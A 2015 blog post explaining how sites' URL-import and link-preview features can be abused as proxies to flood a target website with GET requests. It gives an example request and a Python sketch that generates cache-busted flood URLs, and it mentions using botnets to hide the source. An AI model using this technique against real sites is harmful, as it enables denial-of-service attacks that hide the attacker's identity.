Tuesday, 27 January 2015

GET Request Flooding: Websites as a Proxy

This is a controversial vulnerability: some websites consider it a valid issue, while others don't bother much about it.

Many websites offer an option to fetch images from an external URL, or to post a comment containing a link, which results in real-time loading of the link's title and description; these are the most common examples. In both cases a GET request is made to the third-party website, not from your PC but from the originating website's server.
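As a hypothetical illustration (the hostnames and the `url` parameter name are made up), an image-import feature might turn a user-supplied URL into a server-side fetch like this:

```http
GET /import?url=http://victim.example/large-file.zip HTTP/1.1
Host: proxy-site.example
```

On receiving this, the server at `proxy-site.example` itself issues `GET /large-file.zip` to `victim.example`, so the victim only ever sees traffic from the intermediary site.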

What if we customize the GET request and repeat it a couple of hundred times?
Let's take the example below to demonstrate this scenario:

We first find an input that accepts a URL to a third-party website, and we modify the input into any GET request we like.


When we press the import button, the GET request is sent. We can then capture the data being transmitted in order to repeat the process.


Most websites don't allow the same request to be sent more than once, which is why we have to change a value on every request. We can achieve that in many different ways; in my case, I wrote a small PHP cURL script that does it for you.
We copy all the previously captured data and paste it into our script for the flooding process.
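I won't reproduce the PHP cURL script here, but a rough sketch of the same idea in Python might look like the following. The endpoint, hostnames, and the `url`/`cb` parameter names are assumptions for illustration; the key point is that each request carries a unique cache-busting value so the site can't deduplicate it.

```python
import uuid
from urllib.parse import urlencode

# Hypothetical import endpoint on the site being abused as a proxy
IMPORT_ENDPOINT = "http://proxy-site.example/import"
# Hypothetical resource on the victim site that the proxy will fetch
TARGET_URL = "http://victim.example/large-file.zip"

def build_flood_url(import_endpoint, target_url):
    """Build one import request whose target URL carries a unique
    cache-busting query value, so every request looks new."""
    busted = f"{target_url}?cb={uuid.uuid4().hex}"
    return f"{import_endpoint}?{urlencode({'url': busted})}"

if __name__ == "__main__":
    # In the real attack each URL would be fetched with an HTTP client
    # (the original script used PHP cURL); here we only print them.
    for _ in range(5):
        print(build_flood_url(IMPORT_ENDPOINT, TARGET_URL))
```

Because `cb` changes on every call, no two generated requests are identical, defeating simple same-request filtering on the proxying site.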

If the attacker has a botnet, they can generate this request many times from different locations, all targeting a single website. The victim's website will only log the IP addresses of the originating website, allowing the attacker to obfuscate the attack a step further by using a website as a proxy.